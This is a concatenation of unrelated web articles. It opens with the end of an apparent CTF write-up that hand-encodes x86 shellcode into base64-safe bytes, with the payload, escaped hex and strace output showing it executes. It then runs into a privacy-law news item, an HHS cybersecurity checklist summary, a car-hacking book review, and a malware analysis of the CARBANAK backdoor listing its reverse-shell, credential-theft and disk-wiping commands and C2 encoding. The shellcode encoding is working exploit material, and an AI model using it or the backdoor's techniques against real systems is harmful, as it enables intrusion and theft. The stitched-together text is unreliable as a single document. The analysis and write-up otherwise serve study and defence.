echo -ne 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | xxd -g1 file | cut -b10-57 | tr -d '\n' | sed 's/ /\\x/g'
\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00

And, finally, feed all that into b-64-b-tuff:

$ echo -ne '\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00' | strace ./b-64-b-tuff
read(0, "\204\0\0\1~@\0\0\17<\363\317<\363\332\204\0c\215~@\v\357\217b\20\1\0\6u@\10"..., 4096) = 254
write(1, "Read 254 bytes!\n", 16Read 254 bytes!
)       = 16
write(1, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 340hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=) = 340
write(1, "\n", 1
)                       = 1
exit(1094795585)                        = ?
+++ exited with 65 +++

And, sure enough, it exited with the status that we wanted! Now that we've encoded 12 bytes of shellcode, we can encode any amount of arbitrary code that we choose to!

Summary

So that, ladies and gentlemen and everyone else, is how to encode some simple shellcode into base64 by hand. My solution does almost exactly those steps, but in an automated fashion. I also found a few shortcuts while writing the blog that aren't included in that code.

To summarize:

  • Pad the input to a multiple of 4 bytes
  • Break the input up into 4-byte blocks, and find an xor pair that generates each value
  • Set ecx to a value that's 0x41 bytes before the encoded payload, which is half of the xor pairs
  • Put the other half of each xor pair in-line, loaded into edx and xor'd with the encoded payload
  • If there are any MSB bits set, set edx to 0x80 and use the stack to shift them into the right place to be inserted with a xor
  • After all the xors, add padding that's base64-compatible, but is effectively a no-op, to bridge between the decoder and the encoded payload
  • End with the encoded stub (second half of the xor pairs)

When the code runs, it xors each pair, and writes it in-line to where the encoded value was. It sets the MSB bits as needed. The padding runs, which is an effective no-op, then finally the freshly decoded code runs.

It's complex, but hopefully this blog helps explain it!

South Korea Joins the APEC Cross-Border Privacy Rules System

On Monday, June 12, 2017, South Korea’s Ministry of the Interior and the Korea Communications Commission announced that South Korea has secured approval to participate in the APEC Cross-Border Privacy Rules (“CBPR”) system. South Korea had submitted its intent to join the CBPR system back in January 2017. South Korea will become the fifth APEC economy to join the CBPR system. The other four participants are Canada, Japan, Mexico and the United States.

The APEC CBPR system is a regional, multilateral cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPRs implement the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework. Although all APEC economies have endorsed the system, in order to participate individual APEC economies must officially express their intent to join and satisfy certain requirements.

OCR and Health Care Industry Cybersecurity Task Force Publish Cybersecurity Materials

The U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) and the Health Care Industry Cybersecurity Task Force (the “Task Force”) have published important materials addressing cybersecurity in the health care industry.

The OCR checklist, entitled “My entity just experienced a cyber-attack! What do we do now?,” lists key steps that an organization must undertake in the event of a cyber attack. These steps include:

  • executing response and mitigation procedures and contingency plans by immediately fixing technical and other problems to stop a cybersecurity incident, and taking steps to mitigate any impermissible disclosure of protected health information (“PHI”);
  • reporting the crime to law enforcement agencies, which may include state or local law enforcement, the Federal Bureau of Investigation or the Secret Service;
  • reporting all cyber threat indicators to federal agencies and information-sharing and analysis organizations (“ISAOs”), including the Department of Homeland Security, the HHS Assistant Secretary for Preparedness and Response, and private-sector cyber threat ISAOs; and
  • notifying OCR of the breach as soon as possible, but no later than 60 days after the discovery of a breach affecting 500 or more individuals.

The checklist is accompanied by an infographic that lists these steps and notes that an organization must retain all documentation related to the risk assessment following a cyber attack, including any determination that a breach of PHI has not occurred.

The Task Force, which was established in 2015 by Congress, is composed of government officials and leaders in the health care industry. The Task Force’s report notes that “health care cybersecurity is a key public health concern that needs immediate and aggressive attention” and identifies six key imperatives for the health care industry. These imperatives are:

  • defining and streamlining leadership, governance and expectations for health care industry cybersecurity;
  • increasing the security and resilience of medical devices and health information technology;
  • developing the health care workforce capacity necessary to prioritize and ensure cybersecurity awareness and technical capabilities;
  • increasing health care industry readiness through improved cybersecurity awareness and education;
  • identifying mechanisms to protect research and development efforts and intellectual property from attacks or exposure; and
  • improving information sharing of industry threats, risks and mitigations.

The report lists recommendations and action items under each of these six imperatives. These include (1) evaluating options to migrate patient records and legacy systems to secure environments (e.g., hosted, cloud, shared computer environments), (2) developing executive education programs targeting executives and boards of directors about the importance of cybersecurity education, and (3) requiring strong authentication to improve identity and access management for health care workers, patients, medical devices and electronic health records.

The report concludes by providing a list of key resources and best practices for addressing cybersecurity threats that were gleaned from studying the financial services and energy sectors.

The publication of these cybersecurity materials follows in the wake of several notable cyberattacks, including the WannaCry ransomware attack that affected thousands of organizations in the health care industry.

Book review: The Car Hacker’s Handbook

So, this is going to be a bit of an unusual blog for me. I usually focus on technical stuff, exploitation, hacking, etc. But this post will be a mixture of a book review, some discussion on my security review process, and whatever asides fall out of my keyboard when I hit it for long enough. But, don't fear! I have a nice heavy technical blog ready to go for tomorrow!

Introduction

Let's kick this off with some pointless backstory! Skip to the next <h1> heading if you don't care how this blog post came about. :)

So, a couple years ago, I thought I'd give Audible a try, and read (err, listen to) some Audiobooks. I was driving from LA to San Francisco, and picked up a fiction book (one of Terry Pratchett's books in the Tiffany Aching series). I hated it (the audio experience), but left Audible installed and my account active.

A few months ago, on a whim, I figured I'd try a non-fiction book. I picked up NOFX's book, "The Hepatitis Bathtub and Other Stories". It was read by the band members, and it was super enjoyable to listen to while walking and exercising! And, it turns out, Audible had been giving me credits for some reason, and I have like 15 free books or something that I've been consuming like crazy.

Since my real-life friends are sick of listening to me talk about all the books I'm reading, I started amusing myself by posting mini-reviews on Facebook, which got some good feedback.

That got me thinking: writing book reviews is kinda fun!

Then a few days ago, I was talking to a publisher friend at Rocky Mountain Books, and he mentioned that there's a reviewer they sent a bunch of books to who never wrote any reviews. My natural thought was, "wow, what a jerk!".

Then I remembered: I'd promised No Starch that I'd write about The Car Hacker's Handbook like two years ago, and totally forgot. Am I the evil scientist jerk?

So now, after re-reading the book, you get to hear my opinions. :)

Threat Models

I've never really written about a technical book before, at least, not to a technical audience. So bear with this stream-of-consciousness style. :)

I think my favourite part of the book is the layout. When writing a book about car hacking to a technical audience, there's always a temptation to start with the "cool stuff" - protocols, exploits, stuff like that. It's also easy to forget about the varied level of your audience, and to assume knowledge. Since I have absolutely zero knowledge about car hacking (or cars, for that matter; my proudest accomplishment is filling the washer fluid by the third try and pulling up to the correct side of the gas pumps), I was a little worried.

At my current job (and previous one), I do product security reviews. I go through the cycle of: "here's something you've never seen before: ramp up, become an expert, and give us good advice. You have one week". If you ever have to do this, here's my best advice: just ask the engineers where they think the security problems are. In 5 minutes of casual conversation, you can find all the problems in a system and look like a hero. I love engineers. :)

But what happens when the engineers don't have security experience, or take an adversarial approach? Or when you want a more thorough / complete review?

That's how I learned to make threat models! Threat models are simply a way to discover the "attack surface", which is where you need to focus your attention as a reviewer (or developer). If you Google the term, you'll find lots of technical information on the "right way" to make a threat model. You might hear about STRIDE (spoofing/tampering/repudiation/information disclosure/denial of service/escalation of privileges). When I tried to use that, I tended to always get stuck on the same question: "what the heck IS 'repudiation', anyways?".

But yeah, that doesn't really matter. I use STRIDE to help me come up with questions and scenarios, but I don't do anything more formal than that.

If you are approaching a new system, and you want a threat model, here's what you do: figure out (or ask) what the pieces are, and how they fit together. The pieces could be servers, processes, data levels, anything like that; basically, things with a different "trust level", or things that shouldn't have full unfettered access to each other (read, or write, or both).

Once you have all that figured out, look at each piece and each connection between pairs of pieces and try to think of what can go wrong. Is plaintext data passing through an insecure medium? Is the user authentication/authorization happening in the right place? Is the traffic all repudiatable (once we figure out what that means)? Can data be forged? Or changed?

It doesn't have to be hard. It doesn't have to match any particular standard. Just figure out what the pieces are and where things can go wrong. If you start there, the rest of a security review is much, much easier for both you and the engineers you're working with. And speaking of the engineers: it's almost always worth the time to work together with engineers to develop a threat model, because they'll remember it next time.
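To make that concrete, here's a tiny Python sketch (mine, not the book's) of what my informal threat-model notes end up looking like: pieces, connections, and STRIDE used purely as a list of question prompts. Every component and connection name in it is made up for illustration.

# A minimal, informal threat-model helper: list the pieces, list the
# connections between them, and use STRIDE purely as a question prompt.
# All component and connection names below are invented for illustration.

STRIDE = [
    "spoofing", "tampering", "repudiation", "information disclosure",
    "denial of service", "escalation of privileges",
]

# Things with different trust levels.
components = ["Mobile app", "API gateway", "Auth service", "Database"]

# (source, destination, what crosses the boundary)
connections = [
    ("Mobile app", "API gateway", "user credentials over TLS"),
    ("API gateway", "Auth service", "session tokens"),
    ("Auth service", "Database", "password hashes"),
]

for src, dst, data in connections:
    print(f"{src} -> {dst}: {data}")
    for threat in STRIDE:
        # Prompts for a conversation with the engineers, not findings;
        # most of them will be answered with "not applicable".
        print(f"  - could {threat} happen here?")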

Anyway, getting back to the point: that's the exact starting point that the Car Hacker's Handbook takes! The very first chapter is called "Understanding Threat Models". It opens by taking a "bird's eye view" of a car's systems, and talking about the big pieces: the cellular receiver, the Bluetooth, the wifi, the "infotainment" console, and so on. All these pieces that I was vaguely aware of in my car, but didn't really know the specifics of.

It then breaks them down into the protocols they use, what the range is, and how they're parsed. For example, the Bluetooth is "near range", and is often handled by "BlueZ". USB is, obviously, a cable connection, and is typically handled by udev in the kernel. And so on.

Then they look at the potential threats: remotely taking over a vehicle, unlocking it, stealing it, tracking it, and so on.

For every protocol, it looks at every potential threat and how it might be affected.

This is the perfect place to start! The authors made the right choice, no doubt about it!

(Sidenote: because the rule of comedy is that 3 references to something is funnier than 2, and I couldn't find a logical third place to mention it, I just want to say "repudiation" again.)

Protocols

If you read my blog regularly, you know that I love protocols. The reason I got into information security in the first place was by reverse engineering Starcraft's game protocol and implementing and documenting it (others had reversed it before, but nobody had published the information).

So I found the section on protocols intriguing! It's not like the olden days, when every protocol was custom and proprietary and weird: most of the protocols are well documented, and interfacing with them just requires the right hardware.

I don't want to dwell on this too much, but the book spends a TON of time talking about how to find physical ports, sniff protocols, understand what you're seeing, and figure out how to do things like unlock your doors in a logical, step-by-step manner. These protocols are all new to me, but I loved the logical approach that they took throughout the protocol chapters. For somebody like me, having no experience with car hacking or even embedded systems, it was super easy to follow and super informative!

It's good enough that I wanted to buy a new car just so I could hack it. Unfortunately, my accountant didn't think I'd be able to write it off as a business expense. :(

Attacks

After going over the protocols, the book moves to attacks. I had just taken a really good class on hardware exploitation, and many of the same principles applied: dumping firmware, reverse engineering it, and exploring the attack surfaces.

Not being a hardware guy, I don't really want to attempt to reproduce this part in any great detail. It goes into a ton of detail on building out a lab, exploring attack surfaces (like the "infotainment" system, vehicle-to-vehicle communication, and even using SDR (software defined radio) to eavesdrop and inject into the wireless communication streams).

Conclusion

So yeah, this book is definitely well worth the read!

The progression is logical, and it's an incredible introduction, even for somebody with absolutely no knowledge of cars or embedded systems!

Also: I'd love to hear feedback on this post! I'm always looking for new things to write about, and if people legitimately enjoy hearing about the books I read, I'll definitely do more of this!

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky, and by Group-IB and Fox-IT.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

  • Key logger: Logs key strokes for configured processes and sends them to the command and control (C2) server
  • Form grabber: Monitors HTTP traffic for form data and sends it to the C2 server
  • POS monitor: Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server
  • PST monitor: Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server
  • HTTP proxy monitor: Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use

Table 1: Monitoring threads

Commands

In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

  • 0x0AA37987  loadconfig: Runs each command specified in the configuration file (see the Configuration section)
  • 0x007AA8A5  state: Updates the state value (see the Configuration section)
  • 0x007CFABF  video: Desktop video recording
  • 0x06E533C4  download: Downloads executable and injects into new process
  • 0x00684509  ammyy: Ammyy Admin tool
  • 0x07C6A8A5  update: Updates self
  • 0x0B22A5A7  (unnamed): Add/Update klgconfig (analysis incomplete)
  • 0x0B77F949  httpproxy: Starts HTTP proxy
  • 0x07203363  killos: Renders computer unbootable by wiping the MBR
  • 0x078B9664  reboot: Reboots the operating system
  • 0x07BC54BC  tunnel: Creates a network tunnel
  • 0x07B40571  adminka: Adds new C2 server or proxy address for pseudo-HTTP protocol
  • 0x079C9CC2  server: Adds new C2 server for custom binary protocol
  • 0x0007C9C2  user: Creates or deletes Windows user account
  • 0x000078B0  rdp: Enables concurrent RDP (analysis incomplete)
  • 0x079BAC85  secure: Adds Notification Package (analysis incomplete)
  • 0x00006ABC  del: Deletes file or service
  • 0x0A89AF94  startcmd: Adds command to the configuration file (see the Configuration section)
  • 0x079C53BD  runmem: Downloads executable and injects directly into new process
  • 0x0F4C3903  logonpasswords: Send Windows accounts details to the C2 server
  • 0x0BC205E4  screenshot: Takes a screenshot of the desktop and sends it to the C2 server
  • 0x007A2BC0  sleep: Backdoor sleeps until specified date
  • 0x0006BC6C  dupl: Unknown
  • 0x04ACAFC3  (unnamed): Upload files to the C2 server
  • 0x00007D43  vnc: Runs VNC plugin
  • 0x09C4D055  runfile: Runs specified executable file
  • 0x02032914  killbot: Uninstalls backdoor
  • 0x08069613  listprocess: Returns list of running processes to the C2 server
  • 0x073BE023  plugins: Change C2 protocol used by plugins
  • 0x0B0603B4  (unnamed): Download and execute shellcode from specified address
  • 0x0B079F93  killprocess: Terminates the first process found specified by name
  • 0x00006A34  cmd: Initiates a reverse shell to the C2 server
  • 0x09C573C7  runplug: Plugin control
  • 0x08CB69DE  autorun: Updates backdoor

Table 2: Supported Commands

Configuration

A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video
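Purely as an illustration of how such a state value can be interpreted, the following Python sketch decodes a string of ASCII '0' and '1' flags into named Boolean values. The flag names and their positions are hypothetical; they are not recovered from the malware.

# Illustration only: decode a string of ASCII '0'/'1' flags into named
# booleans, similar in spirit to the "state" value described above.
# The flag names and their positions are assumptions, not reverse-engineered offsets.

FLAG_NAMES = [
    "use_binary_protocol",   # hypothetical: which C2 protocol to use
    "backdoor_installed",    # hypothetical: has installation completed?
    "pst_monitor_running",   # hypothetical: PST monitoring thread state
]

def parse_state(state):
    if set(state) - {"0", "1"}:
        raise ValueError("state must contain only ASCII '0' or '1'")
    return {name: flag == "1" for name, flag in zip(FLAG_NAMES, state)}

print(parse_state("101"))
# {'use_binary_protocol': True, 'backdoor_installed': False, 'pst_monitor_running': True}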

Command and Control

CARBANAK communicates with its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address with a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between two additional fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message
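The following Python sketch illustrates the general shape of such a message. The hash function, field lengths and padding behavior are placeholders and do not reproduce CARBANAK's actual implementation; only the host ID concatenation, the '|' delimiters and the random alphabetic padding follow the description above.

# Sketch of the pseudo-HTTP message layout described above.
# The fingerprint hash and all lengths are placeholders for illustration.
import random
import socket
import string
import uuid
import zlib

def rand_alpha(n):
    return "".join(random.choice(string.ascii_letters) for _ in range(n))

def host_id(campaign_code):
    # Placeholder fingerprint hash; CARBANAK's real algorithm is not reproduced here.
    fingerprint = socket.gethostname() + format(uuid.getnode(), "012x")
    return format(zlib.crc32(fingerprint.encode()), "08X") + campaign_code

def build_message(campaign_code, fields):
    core = "|".join([host_id(campaign_code)] + fields)
    # "Sandwiched" between two random alphabetic fields; whether these are
    # joined with '|' or simply concatenated is an assumption.
    return "|".join([rand_alpha(random.randint(4, 12)), core,
                     rand_alpha(random.randint(4, 12))])

print(build_message("june", ["<command polling placeholder>"]))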

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.

This URI is then used in a GET or POST request. The body of the POST request may contain files in the Windows cabinet (CAB) archive format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon
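The encoding and URI obfuscation steps described in the preceding paragraphs can be sketched as follows. The RC2-CBC encryption step is omitted (the input is assumed to already be ciphertext), and the insertion counts and parameter lengths are arbitrary choices made for illustration.

# Sketch of the Base64 substitution, IV prepending and URI disguise
# described above. Input is assumed to be already-encrypted bytes.
import base64
import random
import string

SCRIPT_EXTS = ["php", "bml", "cgi"]
FILE_EXTS = ["gif", "jpg", "png", "htm", "html", "php"]

def rand_alpha(n):
    return "".join(random.choice(string.ascii_letters) for _ in range(n))

def encode_payload(ciphertext):
    iv = rand_alpha(8)  # random 8-byte alphabetic IV, prepended in the clear
    encoded = base64.b64encode(ciphertext).decode()
    return iv + encoded.replace("/", ".").replace("+", "-")

def disguise_as_uri(encoded):
    chars = list(encoded)
    # Insert a random number of '/' characters at random positions.
    for _ in range(random.randint(2, 6)):
        chars.insert(random.randrange(len(chars) + 1), "/")
    path = "/" + "".join(chars)
    if random.random() < 0.5:
        params = "&".join(f"{rand_alpha(3)}={rand_alpha(5)}"
                          for _ in range(random.randint(1, 3)))
        return f"{path}.{random.choice(SCRIPT_EXTS)}?{params}"
    return f"{path}.{random.choice(FILE_EXTS)}"

print(disguise_as_uri(encode_payload(b"already-encrypted message bytes")))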

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.
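As an illustration of the Firefox portion of this proxy discovery, the snippet below pulls standard proxy preferences out of a prefs.js file. The parsing approach is a simplified stand-in for demonstration and is not taken from CARBANAK's code; the example profile path is illustrative.

# Pull proxy-related preferences out of a Firefox prefs.js file.
import re
from pathlib import Path

PROXY_PREFS = ("network.proxy.http", "network.proxy.http_port",
               "network.proxy.ssl", "network.proxy.ssl_port")

def firefox_proxies(prefs_path):
    pattern = re.compile(r'user_pref\("([^"]+)",\s*"?([^")]*)"?\);')
    found = {}
    for line in Path(prefs_path).read_text(errors="ignore").splitlines():
        match = pattern.search(line)
        if match and match.group(1) in PROXY_PREFS:
            found[match.group(1)] = match.group(2)
    return found

# Example (profile path is illustrative):
# print(firefox_proxies(r"C:\Users\me\AppData\Roaming\Mozilla\Firefox\Profiles\xyz.default\prefs.js"))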

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format

Version 1

In the earliest version of the binary protocol we have discovered, the message bodies stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.
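The XOR scheme used by versions 1 and 2 can be sketched as follows. Treating the key as a repeating keystream over the message body is an assumption made for illustration; the description above only states that bodies are XORed with the host ID (version 1) or with a random 32 to 64 byte session key (version 2).

# Repeating-key XOR sketch for binary protocol versions 1 and 2.
import os
import random

def xor_body(body, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(body))

# Version 1 style: key derived from the host ID (the value here is made up).
v1 = xor_body(b"listprocess", b"1A2B3C4Djune")

# Version 2 style: random 32-64 byte key generated per session and sent
# in the initial message.
session_key = os.urandom(random.randint(32, 64))
v2 = xor_body(b"listprocess", session_key)

assert xor_body(v1, b"1A2B3C4Djune") == b"listprocess"  # XOR is symmetric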

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.
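The version 5 design follows a familiar hybrid-encryption pattern, sketched below with Python's cryptography library. The padding schemes chosen here (OAEP for the key wrap, PKCS7 for the block cipher) are illustrative choices and are not confirmed to match CARBANAK's implementation.

# Generic hybrid-encryption sketch: RSA-wrapped AES-256 session key,
# then AES-CBC for subsequent messages. Parameters are illustrative.
import os
from cryptography.hazmat.primitives import hashes, padding as sym_padding
from cryptography.hazmat.primitives.asymmetric import rsa, padding as asym_padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# In reality the server's public key would be embedded in the backdoor;
# both keys are generated here only so the sketch is self-contained.
server_priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
server_pub = server_priv.public_key()

session_key = os.urandom(32)  # 256-bit AES session key
wrapped_key = server_pub.encrypt(
    session_key,
    asym_padding.OAEP(mgf=asym_padding.MGF1(algorithm=hashes.SHA256()),
                      algorithm=hashes.SHA256(), label=None),
)

def aes_cbc_encrypt(plaintext):
    iv = os.urandom(16)
    padder = sym_padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    encryptor = Cipher(algorithms.AES(session_key), modes.CBC(iv)).encryptor()
    return iv + encryptor.update(padded) + encryptor.finalize()

message = aes_cbc_encrypt(b"command polling placeholder")
# Only the holder of server_priv can unwrap session_key and decrypt `message`.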

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. It has been observed that some builds of this data-stealing backdoor use outdated versions of the protocol. This may suggest that multiple groups of operators are compiling their own builds of the backdoor independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

